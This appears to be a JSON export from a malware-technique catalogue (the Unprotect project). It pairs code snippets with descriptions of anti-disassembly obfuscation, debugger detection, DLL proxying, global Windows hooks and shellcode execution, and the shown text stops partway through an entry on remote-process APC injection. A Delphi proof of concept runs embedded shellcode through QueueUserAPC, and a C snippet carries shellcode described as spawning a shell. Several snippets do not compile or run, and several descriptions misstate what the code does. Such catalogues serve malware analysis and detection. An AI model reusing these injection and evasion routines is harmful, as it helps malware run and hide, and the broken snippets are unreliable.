"description": "This code contains the original instructions, which declare and initialize the variables x and y, and use an if statement to compare their values. The obfuscated instructions use control flow flattling to make it more difficult for the disassembler to accurately interpret the instructions and generate correct disassembly output.\r\n\r\nThe while loop in the obfuscated instructions contains a large switch statement, which has multiple cases that hide the original if statements. This creates a complex and unstructured control flow that is difficult for the disassembler to follow.",
"plain_code": "#include <iostream>\r\n\r\nint main() {\r\n // Original instructions\r\n int x = 0x12345678;\r\n int y = 0x87654321;\r\n if (x == y) {\r\n x = 0x11111111;\r\n y = 0x22222222;\r\n } else {\r\n x = 0x33333333;\r\n y = 0x44444444;\r\n }\r\n\r\n // Obfuscated instructions using control flow flattening\r\n int i = 0;\r\n while (true) {\r\n switch (i) {\r\n case 0:\r\n if (x == y) {\r\n x = 0x55555555;\r\n y = 0x66666666;\r\n }\r\n break;\r\n case 1:\r\n if (x != y) {\r\n x = 0x77777777;\r\n y = 0x88888888;\r\n }\r\n break;\r\n // ...\r\n default:\r\n break;\r\n }\r\n i++;\r\n if (i > 10) {\r\n break;\r\n }\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 140,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/79/?format=api",
"description": "This code ncludes a real function, my_function, which is called by the original and obfuscated instructions. This allows the code to demonstrate the intended behavior of the original instructions, which is to declare and initialize the variable x, declare and initialize the pointer ptr, and use the pointer ptr to dereference and modify the value of x.\r\n\r\nHowever, the obfuscated instructions use pointers in a more complex way, by declaring and initializing two additional pointers, ptr1 and ptr2. This makes it more difficult for the disassembler to accurately interpret the instructions and generate correct disassembly output.",
"plain_code": "#include <iostream>\r\n\r\nint my_function() {\r\n std::cout << \"Hello, world!\" << std::endl;\r\n return 0;\r\n}\r\n\r\nint main() {\r\n // Original instructions\r\n int x = 0x12345678;\r\n int *ptr = &x;\r\n *ptr = 0x87654321;\r\n\r\n // Obfuscated instructions using pointers\r\n int y = 0x12345678;\r\n int *ptr1 = &y;\r\n int *ptr2 = ptr1;\r\n *ptr2 = 0x87654321;\r\n\r\n return 0;\r\n}"
},
{
"id": 139,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/82/?format=api",
"description": "This code includes an exception handler that is called whenever an exception occurs. This exception handler calls the my_function function, which simply prints \"Hello, world!\" to the console. The obfuscated instructions use the SEH mechanism to obscure the control flow of the program, by raising an exception and handling it with the exception handler.",
"plain_code": "#include <Windows.h>\r\n#include <stdio.h>\r\n\r\nvoid my_function() {\r\n printf(\"Hello, world!\\n\");\r\n}\r\n\r\nLONG WINAPI exception_handler(EXCEPTION_POINTERS *exception) {\r\n my_function();\r\n return EXCEPTION_EXECUTE_HANDLER;\r\n}\r\n\r\nint main() {\r\n int eax = 0x12345678;\r\n\r\n // Obfuscated instructions using SEH\r\n __try {\r\n if (eax == 0) {\r\n my_function();\r\n }\r\n RaiseException(0x12345678, 0, 0, NULL);\r\n } __except (exception_handler(GetExceptionInformation())) {\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 138,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/84/?format=api",
"description": "This allows the code to demonstrate the intended behavior of the original instructions, which is to always call the my_function function, regardless of the value of the eax register. This technique can make it difficult for a disassembler to accurately reconstruct the original instructions of the program, as the disassembler will not be able to determine the intended behavior of the program without actually executing it.",
"plain_code": "#include <stdio.h>\r\n\r\nvoid my_function() {\r\n printf(\"Hello, world!\\n\");\r\n}\r\n\r\nint main() {\r\n int eax = 0x12345678;\r\n\r\n // Original instructions\r\n if (eax == 0) {\r\n my_function();\r\n }\r\n if (eax != 0) {\r\n my_function();\r\n }\r\n\r\n // Obfuscated instructions using back-to-back conditional jumps\r\n if (eax == 0) {\r\n my_function();\r\n }\r\n my_function();\r\n\r\n return 0;\r\n}"
},
{
"id": 137,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/86/?format=api",
"description": "This code uses the malloc function to dynamically allocate memory for a target address that will be used as the target of a call instruction. It then uses the main function's address as the base for the target address, and adds an offset of 0x00000004 to it to compute the final target address. This computed target address is then stored in the dynamically allocated memory and is used as the target of the call instruction.",
"plain_code": "#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main() {\r\n // Dynamically compute the target address of the \"call\" instruction\r\n char *target = (char *)malloc(8);\r\n *(unsigned long long *)target = (unsigned long long)main + 0x00000004;\r\n\r\n // Use the dynamically computed target address in a \"call\" instruction\r\n __asm__(\"mov eax, [%0]\\n\"\r\n \"call eax\\n\"\r\n :: \"r\" (target) : \"eax\");\r\n\r\n return 0;\r\n}"
},
{
"id": 136,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/87/?format=api",
"description": "This code contains the original instructions mov eax, 0x12345678 and add eax, 0x00000004, but it also includes some \"garbage\" instructions (the nop instructions) between these two instructions. This breaks the normal sequence of instructions and can cause a disassembler to generate incorrect disassembly output.",
"plain_code": "#include <stdio.h>\r\n\r\nint main() {\r\n // Original instructions\r\n __asm__(\"mov eax, 0x12345678\\n\"\r\n \"add eax, 0x00000004\\n\");\r\n\r\n // \"Garbage\" instructions that break the normal sequence of instructions\r\n __asm__(\"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\");\r\n\r\n // More original instructions\r\n __asm__(\"mov ebx, 0x87654321\\n\"\r\n \"sub ebx, 0x00000004\\n\");\r\n\r\n return 0;\r\n}"
},
{
"id": 135,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/125/?format=api",
"description": "This code creates a NOP slide with eight NOP instructions and then inserts the shellcode at the end of the slide. When the program branches to the start of the code section, it will slide through the NOP instructions until it reaches the shellcode, which will then be executed. This demonstrates how a NOP slide can be used to direct program execution to a specific location when the exact branch target is not known.",
"plain_code": "#include <stdio.h>\r\n#include <windows.h>\r\n\r\n// Shellcode to spawn a cmd.exe process\r\nunsigned char shellcode[] = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n \"\\x68\\x63\\x6d\\x64\\x00\\x8b\\xc4\\x6a\\x01\\x50\\x6a\\x01\\x6a\\x02\\x6a\\x10\"\r\n \"\\x89\\xe1\\xb2\\x0c\\xcd\\x80\\x59\\x6a\\x3f\\x58\\xcd\\x80\\x49\\x79\\xf8\\x68\"\r\n \"\\x2f\\x63\\x61\\x6c\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\"\r\n \"\\xb0\\x0b\\xcd\\x80\";\r\n\r\nint main() {\r\n // Insert a NOP slide at the start of the code section\r\n __asm__(\"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\");\r\n\r\n // Insert the shellcode at the end of the NOP slide\r\n __asm__(\"jmp shellcode\");\r\n\r\n // Allocate memory for the shellcode and copy it into place\r\n void *shellcode_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n memcpy(shellcode_mem, shellcode, sizeof(shellcode));\r\n\r\n return 0;\r\n}"
},
{
"id": 134,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/126/?format=api",
"description": "This code modifies the default function's return address to point to a different location, in this case 0x123456. It also inserts some \"garbage\" instructions (in this case, four no-op instructions) to break disassemblers that use recursive traversal or linear sweep. This makes it more difficult for disassemblers to accurately interpret the next instruction after the call, making them susceptible to other anti-disassembly techniques.",
"plain_code": "#include <stdio.h>\r\n\r\nint main() {\r\n // Store the current value of the return address\r\n void *return_address = __builtin_return_address(0);\r\n\r\n // Modify the return address to point to a different location\r\n __builtin_return_address(0) = (void *)0x123456;\r\n\r\n // Insert garbage bytes to break disassemblers\r\n __asm__(\"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\"\r\n \"nop\\n\");\r\n\r\n // Use the modified return address\r\n return 0;\r\n}"
},
{
"id": 133,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/127/?format=api",
"description": "In this example, the code first allocates an array of 10 random bytes and inserts them into the code. Then, it uses the garbage bytes to confuse a disassembler by adding them to the code in a way that does not affect the program's behavior. When the disassembler tries to analyze the code, it will be unable to correctly reconstruct the original program due to the presence of the garbage bytes. This can make it more difficult to understand and analyze the code's behavior and intentions.",
"plain_code": "#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main()\r\n{\r\n // Insert garbage bytes into the code\r\n char* garbage = malloc(10);\r\n for (int i = 0; i < 10; i++)\r\n {\r\n garbage[i] = rand() % 256;\r\n }\r\n\r\n // Use the garbage bytes to confuse a disassembler\r\n int a = 5;\r\n int b = 10;\r\n int c = a + b;\r\n\r\n printf(\"The result is: %d\\n\", c);\r\n\r\n return 0;\r\n}"
},
{
"id": 132,
"language": {
"id": 5,
"label": "Assembly",
"code_class": "x86asm"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/128/?format=api",
"description": "In this code, the registers eax and ebx are initially assigned to 0. The code then performs some operations on the registers, adding 1 to eax and 2 to ebx.\r\n\r\nNext, the code reassigns the registers by copying the value of `eax` into `ebx` and the value of `ebx` into `eax`. This means that the value of `eax` will be the same as the original value of `ebx`, and vice versa.\r\n\r\nFinally, the code performs more operations on the registers and returns the result. Because of the register reassignment, the final values of `eax` and `ebx` will be different than if the registers had not been reassigned.\r\n\r\nThis code is intended to be difficult to analyze and understand, as the register reassignment makes it more difficult to track the values of the registers. This can make it harder for a reverse engineer or disassembler to understand the code's behavior and intentions.",
"plain_code": "; Initialize registers\r\nmov eax, 0\r\nmov ebx, 0\r\n\r\n; Perform some operations on the registers\r\nadd eax, 1\r\nadd ebx, 2\r\n\r\n; Reassign the registers\r\nmov ebx, eax\r\nmov eax, ebx\r\n\r\n; Perform more operations on the registers\r\nadd eax, 1\r\nadd ebx, 2\r\n\r\n; Return the result\r\nret"
},
{
"id": 131,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/129/?format=api",
"description": "This code snippet defines a vector of instructions, which are simply integer values from 1 to 10 in this example. The instructions are then shuffled using a random number generator, and the instructions are executed in the rearranged order.\r\n\r\nThis code demonstrates how code transposition can be used to rearrange the instructions of a piece of code in a random manner, making it more difficult to follow and understand. In a real-world scenario, the instructions would be more complex and would likely have a different impact on the behavior of the code.",
"plain_code": "#include <iostream>\r\n#include <random>\r\n#include <vector>\r\n\r\nint main()\r\n{\r\n std::vector<int> instructions = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 };\r\n\r\n // Use a random number generator to shuffle the instructions\r\n std::random_device rd;\r\n std::mt19937 g(rd());\r\n std::shuffle(instructions.begin(), instructions.end(), g);\r\n\r\n // Execute the instructions in the rearranged order\r\n for (int instruction : instructions)\r\n {\r\n std::cout << instruction << std::endl;\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 130,
"language": {
"id": 10,
"label": "C",
"code_class": "C"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/130/?format=api",
"description": "In this code, the first opaque predicate is similar to the previous example, where the value of z is calculated by multiplying x and y, which will always result in the value 15. The if statement then checks if z is equal to 15, which is always the case. This makes it difficult for an analyst to understand the intent of the code, as the logic behind the if statement is not immediately apparent.\r\n\r\nThe code then goes on to create another opaque predicate using the values of a and b. In this case, the value of c is calculated by subtracting b from a, which will always result in the value 5. The if statement then checks if c is equal to 5, which is always the case. This adds another layer of complexity to the code, making it even more difficult to understand and reverse engineer. By using multiple opaque predicates, malware authors can create highly obfuscated code that is very difficult to analyze.",
"plain_code": "int main() {\r\n int x = 3;\r\n int y = 5;\r\n int z = x * y;\r\n\r\n // Opaque predicate: z will always be equal to 15,\r\n // so this if statement will always be true\r\n if (z == 15) {\r\n // Do something malicious\r\n\r\n // Create another opaque predicate\r\n int a = 10;\r\n int b = 5;\r\n int c = a - b;\r\n\r\n // This if statement will also always be true\r\n if (c == 5) {\r\n // Do something even more malicious\r\n }\r\n }\r\n}"
},
{
"id": 129,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/72/?format=api",
"description": "This code defines a function named calc_func_crc that calculates the checksum of a given function. It also defines the debuggee_function and debuggee_function_end functions, which are used as the input to the calc_func_crc function. The code then calculates the current checksum of the debuggee_function function and compares it to the original checksum stored in the ORIG_CRC variable. If the checksums do not match, it means the function has been modified and the code takes appropriate action. This is just an example and the code may need to be modified for more complex scenarios.",
"plain_code": "import struct\r\n\r\n# Calculate checksum of function\r\ndef calc_func_crc(func_begin, func_end):\r\n crc = 0\r\n for i in range(func_begin, func_end):\r\n crc += struct.unpack(\"B\", i)[0]\r\n return crc\r\n\r\n# Debuggee function\r\ndef debuggee_function():\r\n calc = 0\r\n calc += 2\r\n calc <<= 8\r\n calc -= 3\r\n\r\n# End of debuggee function\r\ndef debuggee_function_end():\r\n pass\r\n\r\n# Original function checksum\r\nORIG_CRC = 0x2bd0\r\n\r\n# Calculate current function checksum\r\nCUR_CRC = calc_func_crc(debuggee_function, debuggee_function_end)\r\n\r\n# Check if current checksum matches original checksum\r\nif CUR_CRC != ORIG_CRC:\r\n print(\"Stop debugging program!\")\r\n exit(-1)"
},
{
"id": 128,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/73/?format=api",
"description": "This code defines a function named IsDebuggerPresent that uses a try-except block to trigger an interrupt instruction and generate an exception. If the exception is handled, it means the code is being executed in a debugger and the function returns true. If the exception is not handled, it means the code is not being executed in a debugger and the function returns false. The main function calls IsDebuggerPresent and takes appropriate action based on the result. This is just an example and more advanced implementations may be needed for more complex scenarios.",
"plain_code": "#include <iostream>\r\n#include <Windows.h>\r\n\r\n// Function to check if the code is being executed in a debugger\r\nbool IsDebuggerPresent()\r\n{\r\n __try\r\n {\r\n // Trigger an interrupt instruction to generate an exception\r\n __debugbreak();\r\n }\r\n __except (EXCEPTION_EXECUTE_HANDLER)\r\n {\r\n // If the exception is handled, it means the code is being executed in a debugger\r\n return true;\r\n }\r\n\r\n // If the exception is not handled, it means the code is not being executed in a debugger\r\n return false;\r\n}\r\n\r\nint main()\r\n{\r\n if (IsDebuggerPresent())\r\n {\r\n std::cout << \"Debugger detected\" << std::endl;\r\n // Take appropriate action, such as exiting or altering behavior\r\n }\r\n else\r\n {\r\n std::cout << \"No debugger detected\" << std::endl;\r\n // Continue with normal execution\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 127,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/219/?format=api",
"description": "This code uses the ctypes library to load the legitimate DLL and retrieve the address of the function that will be called. It then defines a function named ProxyFunction that will be used to redirect calls to the legitimate DLL. When ProxyFunction is called, it will call the function in the legitimate DLL and return the result. As with the previous example, this code is just an example and more advanced implementations may be needed for more complex scenarios.",
"plain_code": "from ctypes import cdll\r\n\r\n# Function prototype for the function that will be used to redirect calls to the legitimate DLL\r\nProxyFunction = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)\r\n\r\ndef DllMain():\r\n # Load the legitimate DLL\r\n hLegitDLL = ctypes.windll.LoadLibrary(\"legit.dll\")\r\n if not hLegitDLL:\r\n # Handle error\r\n\r\n # Retrieve the address of the function in the legitimate DLL\r\n # This example uses a function named \"FunctionA\", but the function name can be anything\r\n FunctionA = ProxyFunction(hLegitDLL.FunctionA)\r\n if not FunctionA:\r\n # Handle error\r\n\r\n# Function that will be used to redirect calls to the legitimate DLL\r\ndef ProxyFunction(arg):\r\n # Call the function\r\n return FunctionA(arg)"
},
{
"id": 126,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/92/?format=api",
"description": "The HookFunction is injected as a hook using the SetWindowsHookEx function, and it still calls the CallNextHookEx function to continue the normal flow of execution. The main function installs the hook, runs the message loop to receive events, and then uninstalls the hook when finished.",
"plain_code": "import ctypes\r\nfrom ctypes.wintypes import HHOOK, LPARAM, LRESULT, WPARAM\r\n\r\n\r\n# The function to be injected as a hook\r\ndef HookFunction(code: int, wParam: WPARAM, lParam: LPARAM) -> LRESULT:\r\n # Perform malicious actions here\r\n\r\n # Return the result of the next hook in the chain\r\n return ctypes.windll.user32.CallNextHookEx(None, code, wParam, lParam)\r\n\r\n\r\ndef main():\r\n # Install the hook\r\n hHook = ctypes.windll.user32.SetWindowsHookEx(\r\n ctypes.c_int(14), HookFunction, None, 0\r\n )\r\n\r\n # Run the message loop to receive events\r\n msg = ctypes.wintypes.MSG()\r\n while ctypes.windll.user32.GetMessageW(ctypes.byref(msg), None, 0, 0):\r\n ctypes.windll.user32.TranslateMessageW(msg)\r\n ctypes.windll.user32.DispatchMessageW(msg)\r\n\r\n # Uninstall the hook\r\n ctypes.windll.user32.UnhookWindowsHookEx(hHook)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()"
},
{
"id": 125,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"author": {
"id": 3,
"name": "Unprotect",
"email": null,
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/92/?format=api",
"description": "In this code, the `HookFunction` is injected as a hook using the `SetWindowsHookEx` function. This function will be called whenever a low-level mouse event occurs, allowing the malware to monitor and manipulate user actions. The `CallNextHookEx` function is used to call the next hook in the chain, allowing the normal flow of execution to continue.",
"plain_code": "#include <windows.h>\r\n\r\n// The function to be injected as a hook\r\nLRESULT CALLBACK HookFunction(int code, WPARAM wParam, LPARAM lParam) {\r\n // Perform malicious actions here\r\n \r\n // Return the result of the next hook in the chain\r\n return CallNextHookEx(NULL, code, wParam, lParam);\r\n}\r\n\r\nint main() {\r\n // Install the hook\r\n HHOOK hHook = SetWindowsHookEx(WH_MOUSE_LL, HookFunction, NULL, 0);\r\n \r\n // Run the message loop to receive events\r\n MSG msg;\r\n while (GetMessage(&msg, NULL, 0, 0)) {\r\n TranslateMessage(&msg);\r\n DispatchMessage(&msg);\r\n }\r\n \r\n // Uninstall the hook\r\n UnhookWindowsHookEx(hHook);\r\n \r\n return 0;\r\n}"
},
{
"id": 124,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"author": {
"id": 1,
"name": "Jean-Pierre LESUEUR",
"email": "jplesueur@phrozen.io",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/113/?format=api",
"description": "This code snippet demonstrate the use of `QueueUserAPC` with `NtTestAlert` to run our shellcode.\r\n\r\n⚠️ Embedded shellcode will show a message box on behalf of target process. It is harmless but I always recommend to avoid blindly running shellcode you may find in proof of concepts. Feel free to patch both x86-32 / x86-64 version with your own version.",
"plain_code": "// Support both x86-32 and x86-64\r\n\r\nprogram APCRun;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n System.SysUtils,\r\n WinAPI.Messages,\r\n WinAPI.Windows;\r\n\r\ntype\r\n EWindowsException = class(Exception)\r\n private\r\n FLastError : Integer;\r\n public\r\n {@C}\r\n constructor Create(const WinAPI : String); overload;\r\n\r\n {@G}\r\n property LastError : Integer read FLastError;\r\n end;\r\n\r\n\r\nconst STATUS_SUCCESS = NTSTATUS($0);\r\n\r\nfunction NtTestAlert(): DWORD; stdcall; external 'ntdll.dll';\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n FLastError := GetLastError();\r\n\r\n AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n WinAPI,\r\n FLastError,\r\n SysErrorMessage(FLastError)\r\n ]);\r\n\r\n ///\r\n inherited Create(AFormatedMessage);\r\nend;\r\n\r\n{$IFDEF WIN64}\r\n // Execute a messagebox in target process (x86-64)\r\n const PAYLOAD : array[0..284-1] of byte = (\r\n $fc, $48, $81, $e4, $f0, $ff, $ff, $ff, $e8, $d0, $00, $00, $00, $41, $51,\r\n $41, $50, $52, $51, $56, $48, $31, $d2, $65, $48, $8b, $52, $60, $3e, $48,\r\n $8b, $52, $18, $3e, $48, $8b, $52, $20, $3e, $48, $8b, $72, $50, $3e, $48,\r\n $0f, $b7, $4a, $4a, $4d, $31, $c9, $48, $31, $c0, $ac, $3c, $61, $7c, $02,\r\n $2c, $20, $41, $c1, $c9, $0d, $41, $01, $c1, $e2, $ed, $52, $41, $51, $3e,\r\n $48, $8b, $52, $20, $3e, $8b, $42, $3c, $48, $01, $d0, $3e, $8b, $80, $88,\r\n $00, $00, $00, $48, $85, $c0, $74, $6f, $48, $01, $d0, $50, $3e, $8b, $48,\r\n $18, $3e, $44, $8b, $40, $20, $49, $01, $d0, $e3, $5c, $48, $ff, $c9, $3e,\r\n $41, $8b, $34, $88, $48, $01, $d6, $4d, $31, $c9, $48, $31, $c0, $ac, $41,\r\n $c1, $c9, $0d, $41, $01, $c1, $38, $e0, $75, $f1, $3e, $4c, $03, $4c, $24,\r\n $08, $45, $39, $d1, $75, $d6, $58, $3e, $44, $8b, $40, $24, $49, $01, $d0,\r\n $66, $3e, $41, $8b, $0c, $48, $3e, $44, $8b, $40, $1c, $49, $01, $d0, $3e,\r\n $41, $8b, $04, $88, $48, $01, $d0, $41, $58, $41, $58, $5e, $59, $5a, $41,\r\n $58, $41, $59, $41, $5a, $48, $83, $ec, $20, $41, $52, $ff, $e0, $58, $41,\r\n $59, $5a, $3e, $48, $8b, $12, $e9, $49, $ff, $ff, $ff, $5d, $49, $c7, $c1,\r\n $30, $00, $00, $00, $3e, $48, $8d, $95, $fe, $00, $00, $00, $3e, $4c, $8d,\r\n $85, $0b, $01, $00, $00, $48, $31, $c9, $41, $ba, $45, $83, $56, $07, $ff,\r\n $d5, $48, $31, $c9, $41, $ba, $f0, $b5, $a2, $56, $ff, $d5, $48, $65, $6c,\r\n $6c, $6f, $2c, $20, $57, $6f, $72, $6c, $64, $00, $42, $6f, $6f, $00\r\n );\r\n\r\n{$ELSE}\r\n // Execute a messagebox in target process (x86-32)\r\n const PAYLOAD : array[0..236-1] of byte = (\r\n $d9, $eb, $9b, $d9, $74, $24, $f4, $31, $d2, $b2, $77, $31, $c9, $64, $8b,\r\n $71, $30, $8b, $76, $0c, $8b, $76, $1c, $8b, $46, $08, $8b, $7e, $20, $8b,\r\n $36, $38, $4f, $18, $75, $f3, $59, $01, $d1, $ff, $e1, $60, $8b, $6c, $24,\r\n $24, $8b, $45, $3c, $8b, $54, $28, $78, $01, $ea, $8b, $4a, $18, $8b, $5a,\r\n $20, $01, $eb, $e3, $34, $49, $8b, $34, $8b, $01, $ee, $31, $ff, $31, $c0,\r\n $fc, $ac, $84, $c0, $74, $07, $c1, $cf, $0d, $01, $c7, $eb, $f4, $3b, $7c,\r\n $24, $28, $75, $e1, $8b, $5a, $24, $01, $eb, $66, $8b, $0c, $4b, $8b, $5a,\r\n $1c, $01, $eb, $8b, $04, $8b, $01, $e8, $89, $44, $24, $1c, $61, $c3, $b2,\r\n $04, $29, $d4, $89, $e5, $89, $c2, $68, $8e, $4e, $0e, $ec, $52, $e8, $9f,\r\n $ff, $ff, $ff, $89, $45, $04, $68, $6c, $6c, $20, $41, $68, $33, $32, $2e,\r\n $64, $68, $75, $73, $65, $72, $30, $db, $88, $5c, $24, $0a, $89, $e6, $56,\r\n $ff, $55, $04, $89, $c2, $50, $bb, $a8, $a2, $4d, $bc, $87, $1c, $24, $52,\r\n $e8, $70, $ff, $ff, $ff, $68, $42, $6f, $6f, $58, $31, $db, $88, $5c, $24,\r\n $03, $89, $e3, $68, $58, $20, $20, $20, $68, $6f, $72, $6c, $64, $68, $6f,\r\n $2c, $20, $57, $68, $48, $65, $6c, $6c, $31, $c9, $88, $4c, $24, $0c, $89,\r\n $e1, $31, $d2, $6a, $30, $53, $51, $52, $ff, $d0, $90\r\n );\r\n{$ENDIF}\r\n\r\nvar pPayload : Pointer;\r\n\r\nbegin\r\n try\r\n pPayload := VirtualAlloc(nil, Length(PAYLOAD), MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n if not Assigned(pPayload) then\r\n raise EWindowsException.Create('VirtualAlloc');\r\n ///\r\n\r\n CopyMemory(pPayload, @PAYLOAD, Length(PAYLOAD));\r\n\r\n if not QueueUserAPC(pPayload, GetCurrentThread(), 0) then\r\n raise EWindowsException.Create('QueueUserAPC');\r\n\r\n NtTestAlert();\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 123,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"author": {
"id": 1,
"name": "Jean-Pierre LESUEUR",
"email": "jplesueur@phrozen.io",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/113/?format=api",
"description": "This code demonstrate how to use `QueueUserAPC` to run code in a remote process. \r\n\r\nPoC Steps:\r\n\r\n- Create a new process in suspended state.\r\n\r\nMethod N°1:\r\n* Allocate RWX memory in remote process to host our shellcode.\r\n* Copy shellcode to new memory location.\r\n\r\nMethod N°2:\r\n* Create a new memory section.\r\n* Map new memory section to current process.\r\n* Share new memory section with target process.\r\n* Copy shellcode to shared memory location.\r\n\r\n- Implement our shellcode to target process main thread APC queue.\r\n- Resume target process main thread to execute our shellcode.\r\n\r\n⚠️ Embedded shellcode will show a message box on behalf of target process. It is harmless but I always recommend to avoid blindly running shellcode you may find in proof of concepts. Feel free to patch both x86-32 / x86-64 version with your own version.",
